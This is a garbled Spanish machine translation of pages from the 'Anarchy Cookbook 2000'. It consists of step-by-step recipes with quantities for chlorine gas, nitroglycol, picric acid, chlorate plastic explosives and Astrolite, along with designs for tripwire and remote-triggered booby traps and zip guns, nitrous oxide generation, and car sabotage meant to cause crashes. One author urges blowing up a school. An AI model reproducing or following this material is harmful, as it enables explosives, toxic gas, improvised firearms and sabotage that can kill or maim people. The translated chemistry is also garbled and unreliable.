Alguna vez se preguntó por qué las botellas de amoniaco siempre digo "no se mezclan con el cloro", y viceversa? Eso es porque si usted mezcla acuosa de amoniaco con el Ajax o algo parecido, se le dará el suministro de gas cloro. Para capturar, una botella grande y puso el Ajax en la parte inferior. Luego vierta algo de amoníaco hacia abajo en la botella. Dado que el cloro es más pesado que el aire, se mantendrá en el que a menos que use grandes cantidades de cualquiera de Ajax o el amoníaco (no lo hagas!).

CLORO + TREMENTINATome un pequeño paño o un trapo y sumergirlo en esencia de trementina. Rápidamente caer en la botella de cloro. Hay que emiten una gran cantidad de humo negro y, probablemente, comenzar a quemar ...

GENERACIÓN DE HIDRÓGENOPara generar hidrógeno, todo lo que necesita es un ácido y un metal que va a reaccionar con el ácido. Trate de vinagre (ácido acético) con zinc, aluminio, magnesio, etc Usted puede recoger el hidrógeno en algo si se observa que es más ligero que el aire .... encender una pequeña cantidad y se quema con un * pequeño * pop.

Otra forma de crear hidrógeno es por electrólisis del agua. Esto implicaría la separación de agua (H2O) en hidrógeno y oxígeno por una corriente eléctrica. Para ello, se necesita un 12.6 voltios (o un transformador DC), dos tubos de ensayo, un tazón grande, dos electrodos de carbono (se los saca de una batería de 12.6 voltios desobramiento), y la sal de mesa. Disolver la sal en un tazón grande lleno de agua. Sumergir los dos tubos de ensayo en el agua y poner los electrodos dentro de ellos, con la boca del tubo apuntando hacia abajo. Conectar la batería a un cable que va hasta los electrodos.

Esto funciona por un tiempo, pero el cloro se generará junto con el oxígeno que corroe los cables de cobre que conducen a los electrodos de carbono ... (La sal de mesa se

Page 323: 106652012 the Anarchy Cookbook 2000 Es

divide en iones de cloro y sodio, el cloro se desprende como un gas con oxígeno mientras que el sodio reacciona con el agua para formar hidróxido de sodio ....). por lo tanto, si usted puede conseguir sus manos en un poco de ácido sulfúrico, lo utilizan en su lugar. que no afectará a la reacción que no sea haciendo que la conducen la electricidad agua.

ADVERTENCIA:NO use un transformador que genera corriente alterna! No sólo se alterna inherentemente más peligrosos que los de CC, también se produce tanto en hidrógeno y oxígeno en cada electrodo.

Hidrógeno + CLOROTome el tubo de ensayo de hidrógeno y cubrir la boca con su dedo pulgar. Mantenga invertido, y lo pongo cerca de la botella de cloro (no el que ha reaccionado con esencia de trementina). Decir "adiós tubo de ensayo", y colocarlo en la botella. El hidrógeno y cloro debe reaccionar y posiblemente explotar (dependiendo de la pureza y la cantidad de cada gas). Una cosa interesante sobre esto es que no va a reaccionar si es de noche y no hay calor o energía que no está cerca. Cuando una luz se enciende, la energía suficiente está presente para provocar que reaccionen ...

Preparación del oxígenoObtener un poco de peróxido de hidrógeno (a partir de un almacén de la droga) y dióxido de manganeso (a partir de una batería es un polvo negro). Mezclar los dos en una botella, y liberan oxígeno. Si la botella se tapa, la presión se acumula y disparar fuera.

Prueba encendiendo una férula de madera y pegándolo (cuando sólo brillante) en la botella. El oxígeno se hacen estallar en llamas. El oxígeno permite que las cosas para quemar mejor ...

YODOTintura de yodo contiene principalmente alcohol y un poco de yodo. Para separarlos, poner la tintura de yodo en una tapa de metal a una botella y se calienta sobre una vela. Tener un puesto de titular de otra tapa de metal directamente sobre la tintura (alrededor de 4-6 pulgadas por encima de ella) con hielo en la parte superior de la misma. El alcohol debe evaporarse, y el yodo debe sublime, pero debe reformar cristales de yodo en la tapa de metal frío directamente arriba. Si esto funciona (no lo he probado), puede utilizar el yodo, junto con amoníaco para formar triyoduro de nitrógeno.

He encontrado que las tabletas de cloro de piscina con amoníaco fuerte reaccionar a producir grandes cantidades de gas de cloro y el calor ... También mezclar las pastillas con alcohol produce calor, un gas diferente (y altamente inflamable), y posiblemente algún tipo de ácido (que se come en casi todo lo que toca)

Trampaspor el empresario de pompas fúnebres

Bueno en primer lugar le recomiendo que lea el archivo en mi tablero sobre las minas terrestres ... Si no puedes, entonces aquí es el concepto.

Puede utilizar una m-80, H-100, éxito de taquilla o de cualquier otro tipo de explosivo que se iluminará con un fusible. Ahora la forma en que esto funciona es que si usted tiene una pila de 9 voltios, o bien obtener un encendedor solar (preferiblemente) o un poco de lana de acero se puede crear un sistema de encendido remoto. Lo que sí se estableció un esquema como este.

------------------> + De la batería de acero | | -> - de la batería de lana | | / : ==: --- <- Fusible \ | | / ---- Interruptor SPST - \

Page 324: 106652012 the Anarchy Cookbook 2000 Es

Así que cuando el interruptor está en la currnet fluirá a través de la lana de acero o de ignición y calor haciendo que el fusible a la luz. Nota: Para el uso con lana de acero que probar primero y obtener un pedazo de alambre muy delgado y la bomba de la corriente a través de él para asegurarse de que se calentará a la luz del explosivo.

Ahora lo que hay que hacer es plantar su explosiva donde quiera que sea, enterrarlo y cubrir los cables. Desde aquí, tomar una línea de pesca (alrededor de 20 libras de prueba) y atar un extremo a un objeto seguro. Haga que su interruptor asegurado a algo y hacer un bucle en el otro extremo de la línea. Ponga el lazo alrededor del interruptor de tal manera que cuando se tira va a bajar la palanca y salió el explosivo.

Para encender el explosivo ... Lo que hay que hacer es experimentar con esto y encontrar el mejor método ... Déjame saber en cualquier mata las buenas o las nuevas técnicas ... En mi tabla ... (201) 376-4462

ARMAS LOS CABLES Trip TrapPOR Vlad Tepes (de Chicago C64 fama)

Aquí es un método para construir trampas explosivas que, personalmente, inventadas, y que yo he encontrado que funciona mejor que cualquier otro tipo de trampa explosiva liberación.

Hay muchas variaciones posibles en este diseño, pero la premisa básica sigue siendo la misma. Lo que usted necesita:

• 3-4 clavos cada 2 pulgadas de largo y lo suficientemente suave para doblarse con facilidad (hierro galvanizado, funciona bien)

• 6 pies de cable de acero o de la pesca• 5-15 pies de hilo fuerte o cuerda• Una mente muy enferma.

Martillo de dos de los clavos en el tronco de un árbol (alrededor de una pulgada de distancia) de manera que formen una línea horizontal. Se debe estar en ángulo ligeramente hacia arriba, a unos 30 °.

Doble cada uña hacia abajo cerca de una pulgada del tronco. Lleve a su dispositivo de nefasto (por ejemplo una pequeña roca suspendida en un árbol) y el aparejo de una cuerda o una cadena para que la línea se reduce a los dos clavos. Haga un lazo en la cadena por lo que el bucle de * solo * alcanza entre los dos clavos, y aprobar un tercer clavo entre los dos clavos con el lazo en torno a este clavo entre los otros dos (ver diagrama)

clavos doblados / | | ^ La tensión ligeramente hacia arriba# / \ | |# / @ | | @ (@ Son los dos clavos, la cabeza en)# ------! ---- () ------# Viaje de alambre \ /Tronco tercera clavo

Ahora ata un extremo de la línea de pesca a la cabeza del clavo en tercer lugar, y el otro extremo alrededor de otro árbol o de un clavo (en otro árbol, una raíz o un tronco, etc).

Cuando alguien tira del cable de detonación, la uña se sacó y la creación de su enfermedad se dará a conocer para hacer su daño (intenta atar a un percutor).

Hay varias posibles variaciones. Más de un alambre de viaje se puede conectar a la uña misma, o este dispositivo puede ser usado para armar un alambre segundo viaje. Grapas

Page 325: 106652012 the Anarchy Cookbook 2000 Es

grandes de alambre o de gancho y bucles ojo se puede utilizar para reemplazar los dos clavos doblados.

Una variación más interesante utiliza una pieza recta de la varilla de metal con un agujero en cada extremo, o con un asa de alambre corto soldada a cada extremo. Un extremo está unido al cable trampa, el otro está unida a un resorte.

| |* / \ / \ / \ / \ / \ - === () ======= -------------------------- ------------ * Perno de resorte de alambre de viaje

Con este diseño el circuito se dará a conocer si el cable trampa se tira o si está roto. El resorte debe estar bajo una tensión moderada y bien lubricados.

Explosivos ImprovisadosEscrito por: El Lich

Explosivo gelatina de Anti-FreezeATENCIÓN: Esta fórmula supone que el Hacedor no tiene reparos en Matar a su / ella mismo EN EL PROCESO.

Este explosivo es casi el mismo que el plástico nitro-gelatina explosiva, excepto que es flexible y plegable a -10 ° C a -20 ° C

El anticongelante es fácil de obtener que la glicerina y suele ser más barato. Se necesita ser liberado de agua antes de la fabricación y esto puede hacerse por tratamiento con cloruro de calcio hasta una gravedad específica de 1,12 a 0 ° C o 1,11 a 20 ° C se obtiene.

Esto puede hacerse mediante la adición de cloruro de calcio para el anticongelante y comprobar con un hidrómetro y continuar añadiendo cloruro cálcico hasta que la lectura correcta se obtiene. El anticongelante se filtra para eliminar el cloruro de calcio a partir del líquido. Este explosivo es superior a la nitro-gelatina en que es más fácil para collidon la pólvora IMR en el explosivo y que el éter 50/50 de alcohol etílico puede ser eliminada. Es superior en que la formación de la collidon se realiza muy rápidamente por el glicol nitroethelene.

Sus propiedades de detonación son prácticamente el mismo que el nitro-gelatina. Al igual que el nitro-gelatina es muy inflamable y si se detecta en el fuego es muy probable que la llama pasará a la detonación. En este explosivo como en nitro-gelatina la adición de carbonato de sodio al 1% es una buena idea para reducir la posibilidad de ácido residual presente en el explosivo final. La siguiente es una fórmula ligeramente diferente que nitro-gelatina:

Nitro-glicol 75% algodón pólvora (TMI) 6% nitrato de potasio 14% de harina de 5%

En este proceso el paso 50/50 se omite. Mezclar el nitrato de potasio con el nitro-glicol. Recuerde que este nitro-glicol es tan sensible a los golpes, como es la nitroglicerina. El siguiente paso es mezclar la harina de sodio y carbonato de sodio. Mezclar estos amasando con las manos enguantadas hasta que la mezcla es uniforme. Este amasado debe hacerse con cuidado y lentamente. La mezcla debe ser uniforme cuando la tasa de mortalidad infantil en polvo sin humo, se agrega. De nuevo, esto se amasa a la uniformidad. Utilizar el explosivo tan pronto como sea posible.

Si se debe almacenar, guardar en un lugar fresco y seco (0-10 ° C). Este explosivo debe detonar a 7600-7800 m / seg .. Estos dos explosivos son muy potentes y deben ser sensibles a una tapa n º 6 de explosiones o equivalente.

Page 326: 106652012 the Anarchy Cookbook 2000 Es

Estos explosivos son peligrosos y no debe ser hecha a menos que el fabricante ha tenido experiencia con este tipo de compuesto. El tonto e ignorante, así puede olvidar estos explosivos, ya que no va a vivir para llegar a utilizarlas.

No me malinterpreten, estos explosivos han sido fabricados desde hace años con un récord impresionante de seguridad. Millones de toneladas de nitroglicerina se han hecho y se utiliza para la fabricación de dinamita y explosivos de esta naturaleza con muy pocos contratiempos.

La nitroglicerina y el nitroglicol va a matar y sus principales víctimas son los estúpidos y temerario. Antes de la fabricación de estos explosivos tomar una gota de nitroglicerina y empape un pedazo pequeño de papel de filtro y colóquelo sobre un yunque.

Pulse esta caída con un martillo y no ponga más en el yunque. Véase lo que quiero decir! Este compuesto explosivo no debe tomarse a la ligera. Si hay dudas no.

Explosivos Plastique explosivo improvisado de la aspirinaEste explosivo es un derivado de fenol. Se trata de compuestos altamente tóxicos y explosivos a base de ácido pícrico son venenosos si se inhalan, ingieren o se manipulan y se absorbe por la piel. La toxicidad de este explosivo limita su uso debido al hecho de que la exposición sobre la mayoría de los casos provoca la insuficiencia hepática y renal e incluso la muerte si el tratamiento inmediato no se obtiene.

Este explosivo es un primo de TNT, pero es más poderoso que su primo. Es el explosivo utilizado por primera vez militar y fue adoptado en 1888 como una carga de artillería. Originalmente, este explosivo fue derivado del alquitrán de carbón, pero gracias a la química moderna se puede hacer este explosivo fácilmente en aproximadamente tres horas a partir del ácido acetilsalicílico (aspirina purificado).

Este procedimiento consiste en disolver el ácido acetilsalicílico en ácido sulfúrico caliente y añadiendo nitrato sódico o potásico que la aspirina nitratos purificada y toda la mezcla ahogado en agua y se filtra para obtener el producto final. Este explosivo se llama trinitrofenol. Se debe tener cuidado para asegurar que este explosivo se almacena en recipientes de vidrio. Ácido pícrico se forman sales peligrosas cuando se le permite ponerse en contacto con todos los metales, excepto el estaño y aluminio. Estas sales son explosiva primaria y que son súper sensibles. También hará que la detonación del ácido pícrico.

Para que el ácido pícrico obtener una aspirina. Las marcas más baratas funcionan mejor, pero las marcas de buffer debe ser evitado. Polvo de estas pastillas a una consistencia fina. Para extraer el ácido acetilsalicílico de este lugar de polvo este polvo en alcohol metílico y agitar vigorosamente. No todo el polvo se disuelve. Filtrar esta polvo fuera del alcohol. Nuevamente lavar este polvo que se filtró fuera del alcohol con más alcohol, pero con una cantidad menor que la primera extracción. Nuevamente filtrar el polvo restante fuera del alcohol. Combinar el alcohol ahora claro y permitir que se evapore en un plato de pyrex. Cuando el alcohol se haya evaporado habrá una sorprendente cantidad de cristales en el fondo del plato de pyrex.

Tomar cuarenta gramos de estos cristales de ácido acetilsalicílico y purificados se disuelven en 150 ml de ácido sulfúrico (98%, especificar la gravedad 1,8) y el calor para disolver todos los cristales. Este calentamiento puede realizarse en una sartén eléctrico común con el termostato en 150 ° F y lleno de un aceite de cocina buena.

Cuando todos los cristales se hayan disuelto en el ácido sulfúrico tomar el vaso, lo que has hecho todo esto se disuelve en (600 ml), fuera del baño de aceite. El siguiente paso tendrá que ser hecho con un sistema de ventilación muy bueno (que es una buena idea para hacer cualquier trabajo, tales como la química de todo el procedimiento y cualquier procedimiento en este disco con una buena ventilación o en el exterior). Lentamente comienza a añadir 58 g de nitrato de sodio o 77 g de nitrato de potasio a la mezcla de ácido en el vaso de precipitados muy lentamente en pequeñas porciones con agitación vigorosa. Un gas rojo (trióxido de nitrógeno) se formará y esto debe evitarse.

Page 327: 106652012 the Anarchy Cookbook 2000 Es

La mezcla es probable que la espuma y la adición debe ser parado hasta que la espuma se reduce para evitar el desbordamiento de la mezcla de ácido en el vaso de precipitados. Cuando el sodio o nitrato de potasio se ha añadido la mezcla se deja enfriar algo (30-40 ° C). La solución entonces debe ser descargado lentamente en dos veces su volumen de hielo picado y agua. Los cristales de color amarillo brillante se formará en el agua. Estos deben ser filtrados y se colocó en 200 ml de agua destilada en ebullición. Este agua se deja enfriar y después los cristales se filtran fuera del agua. Estos cristales son un trinitrofenol muy, muy puro. Estos cristales se colocan entonces en un plato de pyrex y lugares en un baño de aceite y se calentó a 80 ° C y se mantuvo allí durante 2 horas. Esta temperatura se mantiene mejor y comprobar con un termómetro.

Los cristales se pulveriza entonces en pequeñas cantidades a una consistencia de polvo cara. Estos cristales en polvo se mezcla a continuación con 10% en peso de cera y 5% de vaselina que se calientan a temperatura de fusión y se vertió en los cristales. La mezcla se hace mejor amasando con las manos enguantadas. Este explosivo debe tener una amplia plasticidad útil de 0-40 ° C. La velocidad de detonación debe estar alrededor de 7000 m / seg .. Es tóxico para manejar sino simplemente a base de ingredientes comunes y es adecuado para el trabajo de demolición más requieren una velocidad de detonación moderadamente alta. Es muy adecuado para cargas huecas y algunos cargos de corte de acero. No es tan bueno como un explosivo C-4 u otros explosivos basados RDX pero es mucho más fácil de hacer. Una vez más este explosivo es muy tóxico y debe ser tratado con sumo cuidado.

Evite manipular con las manos desnudas, respirar el polvo y humos, evitar cualquier posibilidad de la ingestión. DESPUÉS DE UTENSILIOS se utilizan para la fabricación de este EXPLOSIVO retire del entorno de la cocina como el PROBABILIDAD DE ENVENENAMIENTO POR NO vale la pena arriesgarse. Este explosivo, si se fabrica COMO ANTERIORMENTE, DEBE ESTAR SEGURO DE ALMACENAMIENTO DE ALMACENAMIENTO, sino con cualquier explosivo de fabricación casera no la SG RECOMENDADO Y EXPLOSIVOS SE DEBE HACER según se necesite.

Explosivos Plastique explosivo improvisado de BleachEste explosivo es un explosivo clorato potásico. Este explosivo y explosivos de composición similar se utilizaron en la Segunda Guerra Mundial como el relleno de explosivo principal en granadas, minas terrestres, y el mortero utilizado por francés, alemán, y otras fuerzas involucradas en ese conflicto. Estos explosivos son relativamente seguros de fabricar.

Uno debe esforzarse para asegurarse de que estos explosivos son libres de azufre, sulfuros, y el ácido pícrico. La presencia de estos compuestos en mezclas de resultado que son o pueden llegar a ser muy sensibles y posiblemente descomponerse explosivamente durante el almacenamiento. La fabricación de este explosivo de la lejía se da sólo como un método conveniente. Este método de fabricación de clorato de potasio no es económico debido a la cantidad de energía utilizada para hervir la solución y provocar la reacción de la 'disociación' a tener lugar. Este procedimiento funciona y se obtiene un producto libre relativamente puro y un sulfuro de azufre /. Estos explosivos son muy sensibles y limitar sólo requieren una tapa # 3 para instigar a la detonación.

Para la fabricación de clorato de potasio de la lejía (5% ¼ solución de hipoclorito de sodio) de obtener una fuente de calor (placa caliente, etc) un hidrómetro de baterías, una gran pyrex o recipiente de acero esmaltada (para pesar productos químicos), y algunos de cloruro de potasio (vendido como sustituto de la sal) . Tome un galón de blanqueador, póngalo en el recipiente y comenzar el calentamiento. Si bien esta solución calienta, pese 63 g de cloruro de potasio y agregue esto al cloro que se calienta. Llevar esta solución a ebullición y se hierve hasta que se la checa un hidrómetro la lectura es de 1,3 (en caso de un hidrómetro de la batería se debe leer la carga completa).

Cuando la lectura es de 1,3 tomar la solución y dejar enfriar en el refrigerador hasta que esté entre la temperatura ambiente y 0 ° C. Filtra los cristales que se han formado y salvarlos. Hervir la solución hasta que lo lee 1.3 en el hidrómetro y otra vez se

Page 328: 106652012 the Anarchy Cookbook 2000 Es

enfríe la solución. Filtra los cristales que se han formado y salvarlos. Hierva esta solución de nuevo y enfriar como antes.

Filtrar y guardar los cristales. Tome los cristales que se han guardado y se mezclan con agua destilada en las siguientes proporciones: 56 g por cada 100 ml de agua destilada. Caliente esta solución hasta que hierva y deje que se enfríe. Filtrar la solución y guardar los cristales que se forman por enfriamiento. El proceso de purificación si se llama cristalización fraccionada. Estos cristales deben ser clorato potásico relativamente puro.

Polvo de los mismos. A la consistencia de polvos para la cara (400 mesh) y calentar suavemente para eliminar toda la humedad Fundir cinco partes de vaselina y cinco partes de cera. Disuelva esto en gasolina blanca (gasolina estufa de campo) y vierta este líquido en 90 partes clorato de potasio (los cristales de la operación anterior) en un recipiente de plástico. Amase este líquido en el clorato de potasio hasta mezclarse inmediatamente. Permita que toda la gasolina se evapore. Coloca este explosivo en un lugar fresco y seco. Evitar la fricción, azufre, sulfuro, y compuestos de fósforo.

Este explosivo se moldea mejor a la forma deseada y la densidad (1.3g/cc) y se sumergen en cera a prueba de agua. Estos cargos de tipo bloque garantizan la velocidad más alta detonación. Este explosivo no es realmente apto para su utilización en aplicaciones de carga hueca, debido a su velocidad de detonación relativamente baja. Es comparable a la dinamita amoníaco al 40% y puede considerarse el mismo en aras de cálculo de carga.

Si el clorato de potasio se compra y se hizo no se pone en el proceso de fabricación en las etapas anteriores espolvoreado la adición de la mezcla de cera / vaselina. Este explosivo es bristant y de gran alcance. La adición de polvo de aluminio 2-3% aumenta su efecto de la explosión. Velocidad de detonación es 3300 m / seg.

Explosivos Plastique a partir del compuesto de cloración Piscina PiscinaEste explosivo es un clorato de explosivos de la lejía. Este método de producción de clorato de potasio o de sodio es más fácil y se obtiene un producto más puro que hace el plástico explosivo de proceso blanqueador.

En esta reacción la HTH (hipoclorito de calcio CaC10) se mezcla con agua y se calentó con cloruro de sodio o bien (sal de mesa, sal de roca) o cloruro de potasio (sustituto de la sal). La última de estas sales es la sal de elección debido a la cristalización fácil del clorato de potasio.

Esta mezcla se necesita ser hervida para asegurar la reacción completa de los ingredientes. Obtener una partida de billar HTH natación compuesto de cloración o su equivalente (por lo general 65% de hipoclorito de calcio). Al igual que con el proceso de blanqueo se mencionó anteriormente, la reacción descrita a continuación es también una reacción de disociación. En un gran cristal de pyrex o recipiente de acero esmaltado lugar 1200g HTH y 220 g de cloruro de potasio o cloruro de sodio 159 g. Añadir suficiente agua hirviendo para disolver el polvo y hervir esta solución. Una sustancia calcárea (cloruro de calcio) se formarán. Cuando la formación de esta sustancia calcárea ya no se formó la solución se filtró mientras hirviendo. Si el cloruro de potasio se utiliza clorato potásico se formarán.

Este clorato de potasio se abandonan o se cristalizan como el líquido claro que queda después de filtrado se enfría. Estos cristales se filtran cuando la solución alcance la temperatura ambiente. Si la sal de cloruro de sodio se utiliza este filtrado claro (después de la filtración de líquidos claros) tendrá que tener toda el agua se evapora. Esto dejará cristales que se deben guardar.

Estos cristales deben ser calentados en un horno ligeramente caliente en un plato de pyrex para eliminar todas las trazas de agua (40-75 ° C). Estos cristales se trituran hasta obtener un polvo muy fino (400 mallas).

Si la sal de cloruro de sodio se utiliza en la etapa inicial de la cristalización es mucho más tiempo. El cloruro de potasio es la sal que se utiliza como producto resultante se cristaliza de la solución mientras se enfría. Los cristales de clorato en

Page 329: 106652012 the Anarchy Cookbook 2000 Es

polvo y completamente seca se amasa con vaselina en un recipiente de plástico. LOS EXPLOSIVOS, clorato BASE SON SENSIBLES A LA fricción y choque y éstos deben ser evitados. Si cloruro de sodio se utiliza en este explosivo que tendrá una tendencia a apelmazarse y tiene una velocidad de detonación ligeramente inferior.

Este explosivo se compone de los siguientes:

• De potasio / sodio Clorato de 90% • Vaselina 10%

Simplemente vierta el polvo en un cuidado de plástico acolchado y amasar en la vaselina. Este explosivo (especialmente si la variación de clorato de sodio se utiliza) no debe ser expuesto al agua oa la humedad.

La velocidad de detonación puede ser elevado a un grado ligero por la adición de 2-3% de aluminio sustituidos por 2-3% de la vaselina. Esta adición de este aluminio dar al explosivo un destello brillante, si partió en la noche que se va a arruinar la visión nocturna por un corto tiempo. La velocidad de detonación de este explosivo es de aproximadamente 3,200 m / seg para la sal de potasio y 2900 m / seg para la sal de sodio basado explosivo.

Se afirmó anteriormente que este explosivo se degrada con el tiempo. Supongo que esto ocurre debido al pequeña cantidad de agua presente en la vaselina, y que un tipo diferente de combustible sería mejor que la vaselina.

Nasties variados:Sweet-Oil

En éste no se abre la campana y vierta un poco de miel en su petróleo pico. Si usted tiene tiempo que podría remover el tapón de aceite primero y drenar un poco de aceite a cabo. He intentado esto, pero no fue una vuelta para ver los efectos, pero estoy seguro de que hice un poco de daño.

Slow AirOK, sigilosamente el coche a las víctimas y hacer un agujero pequeño en algún lugar de dos de los otras llantas. Ellos sólo tienen una de repuesto. Ahora bien, si el agujero es pequeño pero luego los neumáticos se desinflará en algún lugar en la carretera. Usted puede cortar el neumático por lo que es golpes en el camino con una cuchilla de afeitar. Cortar una vuelta larga y bastante profunda (no un agujero hasta el final) y la cáscara de un poco de la goma y cortar eso. Ahora muy pronto que los neumáticos se van plana o un posible golpe a una velocidad alta si tienes suerte.

Fuga de pinturaCorre un poco de gas o diluyente de pintura en el coche a las víctimas y esto hará que la pintura correr y desaparecer. El vodka se comen la pintura y también lo hará un poco de 190. Huevos gran trabajo en la pintura si se sientan allí el tiempo suficiente.

Rueda sueltaAfloje los salientes de las víctimas le neumáticos, así que pronto caerá. Esto realmente puede joder a alguien por si se cruza cuando el neumático se cae.

Doble NeutralEste nombre apesta, y saque el perno de 10 o lo que cada vez que tienen allí fuera. (En las ruedas de verdad, en el centro del eje) Ahora lanzan algunos tornillos, tuercas, borrones y cosas variadas de allí y colocar la tapa. En este punto usted podría socavar algunos de los dientes frente a los engranajes.

Un-MidaserPasar por debajo hay coches con el trinquete y aflojar todas las tuercas en su escape de manera que se cuelga baja y se caerá pronto. Este método también funciona en las transmisiones, pero es un poco más difícil de conseguir todos los tornillos fuera, pero el más difícil de trabajar más que los más de mierda.

Laughing Gas

Page 330: 106652012 the Anarchy Cookbook 2000 Es

Aprende a hacer gas de la risa a partir de nitrato de amonio. Gas de la risa fue uno de los primeros anestésicos. Después de un rato de la inhalación de los gases de la paciente se puso tan feliz [que no es gran vida?] Que no podía contener la risa. Por último, se deriva frente a un sueño placentero.

Algunos hágalo usted mismo han muerto al tomar gas de la risa. Esto se debe a que ha generado a través de bolsas de plástico, mientras que sus cabezas estaban en el interior. Simplemente estaban ahogando, pero fueron bombardeados también a darse cuenta.

El truco es tener una bolsa de ropa de plástico en la que se genera una gran cantidad del gas. A continuación, dejar de generar el gas y mantener una pequeña abertura de la bolsa debajo de su nariz, recibiendo un montón de oxígeno en el ínterin. Entonces, Whee! Para hacer que usted comienza con el nitrato de amonio comprado en una casa de suministro de productos químicos o que se han purificado con 100% de roce o alcohol de madera.

En primer lugar, disolver una cantidad de nitrato de amonio en un poco de agua. A continuación, se evapora el agua sobre la estufa, mientras se agita, hasta que tenga una salmuera fuerte. Cuando casi toda la humedad está fuera debe solidificar instantáneamente cuando una gota se coloca sobre una placa de hielo frío metal.

Cuando esté listo, lo tira todo en una superficie muy fría. Después de un rato, romper y guárdelo en un frasco.

Una cucharada se pone en un matraz con un tapón de un agujero, con un tubo que conduce a una bolsa de plástico grande. El matraz se calienta con una lámpara de alcohol.

Cuando la temperatura en el matraz alcanza 480 F del gas va a generar. Si que aparezcan humos blancos el calor se debe reducir como la materia explota a 600 F.

Cuando la bolsa está llena, detener la acción y estar listo para encender.

PRECAUCIÓN:N ² O suplanta el oxígeno en la sangre, pero no se dan cuenta. Es fácil morir de N ² O porque usted es sofocante y el reflejo de la respiración no lo sabe. No ponga su cabeza en una bolsa de plástico. Usted alegremente se ahogue a la muerte.

TUBOS Y ARMAS "ZIP"Comúnmente conocido como "zip" armas de fuego, armas hechas de tubos se han utilizado durante años por los punks de menores. Los militantes de hoy en día los hacen sólo por el placer de hacerlo, o para disparar una vez en un asesinato o disturbios y tirar si hay algún peligro de aprehensión.

Se pueden usar muchas veces, pero con algunos, una longitud de espiga que se necesita para forzar la salida del depósito gastado.

Hay muchas variaciones, pero la ilustración muestra el diseño básico.

En primer lugar, la culata de madera está hecha y una ranura se corta para el barril para descansar pulg El barril está a continuación, asegurado con cinta adhesiva a la población con una cinta buena, fuerte.

El disparador está hecha de estaño galvanizado. Una ranura está perforado en la solapa de disparo para sostener un clavo para techos, que está conectado o soldada a la solapa. El disparador se dobla y se clavó a la población en ambos lados.

El tubo es una corta longitud de un cuarto de pulgada de acero tubo de gas o agua con un agujero que encaja en un cartucho, sin embargo, mantiene el borde del cartucho de pasar a través de la tubería.

Page 331: 106652012 the Anarchy Cookbook 2000 Es

El cartucho se coloca en el tubo y la tapa, con un agujero taladrado a través de ella, está enroscada. Luego, el gatillo se libera lentamente para dejar pasar el clavo en el orificio y el resto de la cartilla.

Para el fuego, se aprieta el gatillo hacia atrás con la mano izquierda y se sujeta conel pulgar de la mano derecha. La pistola se apunta y el pulgar libera eldisparar y lo dispara en realidad.

Tubos de diferentes longitudes y diámetros se encuentran en cualquier ferretería. Todas las balas de gran calibre, desde el 0.22 al 0.45 se utilizan en las pistolas de este tipo.

Algunas pistolas zip están hechos de dos o tres tubos anidados uno dentro del otro. Por ejemplo, una cáscara .22 encaja perfectamente en una longitud de línea de un coche de cobre de gas. Desafortunadamente, el cobre es demasiado débil para soportar la presión de la cocción. Así la longitud de la línea de gas se extiende con pegamento y empujado en una longitud mayor de la tubería. Esto se extendió con pegamento y empujados a una longitud de tubo de acero con rosca y una gorra.

El uso de este método, puede adaptarse a cualquier cartucho, incluso un rifle de shell. El primer tamaño de la tubería de un depósito tiene capacidad para rifle de la bala. La segunda alberga la cámara de polvo en general.

Una escopeta de calibre 12 se pueden hacer de una tubería de acero 3/4 pulgadas. Si quiere cumplir con las leyes de armas de fuego, el cañón debe ser de al menos dieciocho pulgadas de largo.

Su mecanismo de disparo es el mismo que el de la pistola. Como es natural, tiene una acción más larga y su asa se alarga en la culata de un rifle. Además, un pequeño clavo es conducido hasta la mitad en cada lado de la población de aproximadamente cuatro pulgadas en la parte frontal del gatillo. La banda elástica se coloca sobre un clavo y trajo todo el gatillo y se enganchó en el otro clavo.

En caso de que en realidad hacen un arma de fuego zip, hay que probarlo antes de disparar con la mano. Esto se hace en primer lugar, empatando el arma a un árbol o un poste, señaló que no hará ningún daño. Luego de una cadena está ligada a la de disparo y te vas a varios metros. La cadena se tira hacia atrás y dejar ir. Si el barril no estallar, el arma es (probablemente) seguro para disparar con la mano. Repita los despidos pueden debilitar el barril, por lo que ningún arma postal puede ser considerado "seguro" para su uso.

Astrolite y Explosivos de sodio clorato Por: El espía de futuro y la lucha contra el Falcon

Nota: La información sobre los explosivos Astrolite fueron tomadas del libro "Dos alto componente de una mezcla explosiva por el desierto Pub'l

Algunos de los productos químicos utilizados son algo tóxico, pero que le importa un carajo! ¡Adelante! Ni siquiera se molestará en mencionar "Esta información es sólo para fines esclarecedores! Me encantaría que todo el mundo hace un galón de Astrolite y sopló su escuela de mierda al reino de escoria!

AstroliteLa familia Astrolite de explosivos líquidos fueron producto de la investigación propulsor de cohete en los años 60 s '. Astrolite A-1-5 se supone que es el más poderoso del mundo no nuclear explosivo-en alrededor de 1,8 a 2 veces más potente que el TNT. Al ser más poderosa que también es más seguro de manejar que los de TNT (no es que no es seguro, en primer lugar) y nitroglicerina.

Astrolite G"Astrolite G es un explosivo líquido transparente especialmente diseñado para producir velocidad de detonación muy alta, 8.600 MPS (m / seg.), En comparación con 7,700 MPS

Page 332: 106652012 the Anarchy Cookbook 2000 Es

para nitroglicerina y 6.900 MPS para TNT ... Además, una característica muy inusual es que el explosivo líquido tiene la capacidad de ser absorbido fácilmente en el suelo sin dejar de ser detonable ... En las pruebas de campo, Astrolite G ha sido detonable durante 4 días en el suelo, incluso cuando el suelo estaba empapado debido a la lluvia "sé lo que significa ? .... Astrolite Dynamite!

Para hacer (mezclar en un recipiente bastante grande y exterior) Dos partes en peso de nitrato de amonio mezclado con una parte por hidrazina 'anhidro' peso, produce Astrolite G. .. suficientemente simple eh? Estoy seguro de que la proporción de 2:1 no es perfecto, y que si te equivocas un rato con él el tiempo suficiente, que usted va a encontrar una fórmula mejor. Además, sé por qué dice el libro "anhidro" hidracina, hidracina anhidra ya está ...

La hidracina es el producto químico es probable que tenga el tiempo más difícil conseguir el asimiento de. Usos de hidracina son: combustible para cohetes, los productos químicos agrícolas (maleico Hydra-Zide), drogas (antibacteriano y antihipertensivos), el catalizador de polimerización, deposición de metales sobre el vidrio y los plásticos, los flujos de soldadura, reveladores fotográficos, equipos de buceo. La hidracina es también el producto químico se debe tener cuidado con el.

Astrolite A/A-1-5Mezclar 20% (peso) de polvo de aluminio para el nitrato de amonio, y luego mezclar con hidrazina. El polvo de aluminio debe ser malla 100 o más fino. Astrolite A tiene una velocidad de detonación de 7.800 MPS.

Información VariaUsted debe tener cuidado de no obtener ninguno de los Astrolite de que, si sucede, sin embargo, usted debe lavar el área con agua. Astrolite A & G tanto debe ser capaz de ser detonado por una tapa # 8 voladura.

